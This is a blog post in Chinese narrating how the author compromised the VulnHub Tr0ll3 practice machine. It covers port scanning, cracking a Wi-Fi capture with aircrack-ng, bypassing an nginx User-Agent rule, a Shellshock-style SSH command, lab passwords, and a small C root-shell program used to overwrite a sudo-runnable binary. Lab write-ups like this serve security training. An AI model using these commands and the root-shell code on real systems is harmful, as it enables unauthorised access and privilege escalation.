vulnhub靶场Tr0ll3靶场

最新推荐文章于 2024-08-23 14:22:30 发布

嘿嘿也不太行！

最新推荐文章于 2024-08-23 14:22:30 发布

阅读量161

点赞数

分类专栏： vulnhub靶场文章标签：安全

本文链接：https://blog.csdn.net/zzzzzzkeai/article/details/128064539

版权

vulnhub靶场专栏收录该内容

10 篇文章 1 订阅

订阅专栏

vulnhub靶场–靶场

信息收集

主机发现

ifconfig 查看Kali IP
在这里插入图片描述
nmap192.168.17.0/24

端口扫描

nmap -sV 192.168.17.130 -p-
在这里插入图片描述
可以看到开啦22端口 OpenSSH 7.6p1

信息收集信息整理

只有开放啦一个端口22端口openssh7.6只存在一个用户名的漏洞
在这里插入图片描述
本来都打算放弃啦在准备关靶机时看到啦~

登录一下ssh试一试

成功登录

威胁建模

登录ssh
在这里插入图片描述

发现也不能访问，然后也没有什么信息啦去看看redpill

我怀疑这是另一个ssh账户

step2:Password1!
在这里插入图片描述
啊偶猜错啦耶

然后pwd拉一下打算去看看其他目录。这一看好像是有step2这个用户的，but不知道密码难搞呀~

使用命令 find / -type f -perm 777 2>/dev/null查找具有所有权限的文件。
在这里插入图片描述
scp start@IP_address：file_path ./home/Kali/ 将文件从远程主机复制到我们的机器

scp -r start@192.168.17.130:/var/log/.dist-manage/wytshadow.cap ./Documents/Tr0ll3/

scp -r start@192.168.17.130:/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt ./Documents/Tr0ll3/
在这里插入图片描述

查看文件夹成功下载下来啦

查看gold_star.txt
在这里插入图片描述

只用wireshart查看wytshadow.cap包所有数据包的协议均为**“802.11”。**
802.11 是用于在无线连接设备之间传输数据包的协议。

其中可以注意到wytshadow只一个用户名
在这里插入图片描述
我们使用一个名为aircrack-ng的工具，它可能有助于提取密码。

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件，主要功能有：网络侦测，数据包嗅探，WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上（设备列表请参阅其官方网站）并嗅探802.11a，802.11b，802.11g的数据。

aircrack-ng 使用 - 知乎 (zhihu.com)

aircrack-ng -w gold_star.txt wytshadow.cap
在这里插入图片描述

成功爆出wytshadow密码gaUoCe34t1

有一个红色的东西我一开始以为是文件结果是可执行文件

太可怕啦感觉ctrl+c停止掉
sudo -l查看我们可以使用roo权限开启nginx服务

查看nginx目录
在这里插入图片描述
cd /etc/nginx/sites-available

查看配置文件default
在这里插入图片描述

可以看到我们可以使用8080上的lynx服务远程处理它然后我们可以使用sudo service nginx start开启服务可以netstat -nalp | less查看服务开启情况端口等
在这里插入图片描述

可以看到8080端口开启啦

然后可以在kali上访问 http://192.168.17.130:8080 好像没有耶也访问不了lynxhttp://192.168.17.130:8080再次去理解配置文件–如果请求不包括用户代理，服务器将始终响应 403 错误。不幸的是，由于该文件是只读的，因此我们无法更改配置

这里有几种解决方式

1、curl -H "User-Agent: Lynx Basto" 192.168.56.101:8080
2、抓包修改改user_agent
3、sudo apt-get install lynx 然后通过命令行访问lynx http://192.168.17.130:8080

在这里插入图片描述
看来有时一个用户账号啦~ genphlux:HF9nd0cR!

登录查看
在这里插入图片描述

可以看到一个RSA密钥文件名就是用户名另一个HTML的目录列表我们尝试ssh登录新用户maleus

scp -r genphlux@192.168.17.130:/home/genphlux/maleus ./home/kali

登录maleus用户

ssh -i maleus maleus@192.168.17.130

ssh maleus@192.168.17.130 -i maleus -t ‘() { :;}; /bin/bash’
在这里插入图片描述

要密码耶~尝试啦几种方法都需要密码然后在其他师傅的文章里找到啦原因
在这里插入图片描述
SSH服务禁止我们使用权限集太广的证书文件。因此，我们必须首先提前缩小文件权限。

所以现需要缩小文件的权限chmod 600 maleus
在这里插入图片描述
成功连接上啦

dont_even_bother是一个可执行文件，运行一下可以看到只是一个需要输入密码的地方。

然后最终在。viminfo文件里找到密码

B^slc8I$

使用sodo -l查看这个用户权限
在这里插入图片描述

我们要用一个新的shell文件去覆盖这个文件然后来进行提权因为用户可以以root用户的权限执行文件

int main(void)
{
setgid(0);setuid(0);system("/bin/sh");
}

在这里插入图片描述
因为linux5.0之后命令是不能待（）括号的如若需要带括号便需要转译。

如下是两种转义方式：

**方式1：**只需在括号前后加上反斜杠[ \ ]。转义括号为可读。

**方式2：**在括号的两端加上[ " " ]，注意：这是英文输入法下的双引号哦。

int main\(void\)
{
setgid\(0\);setuid\(0\);system\("/bin/bash"\);
}

在这里插入图片描述
在编译一下这个文件

gcc dont_even_bother.c -o dont_even_bother
在这里插入图片描述
成功拿flag

嘿嘿也不太行！

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
vulnhub靶场Tr0ll3靶场

vulnhub靶场--Tr0ll3靶场
复制链接

扫一扫

专栏目录